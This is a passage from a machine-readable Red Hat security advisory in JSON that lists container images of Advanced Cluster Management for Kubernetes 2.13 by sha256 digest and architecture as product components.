"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le"
},
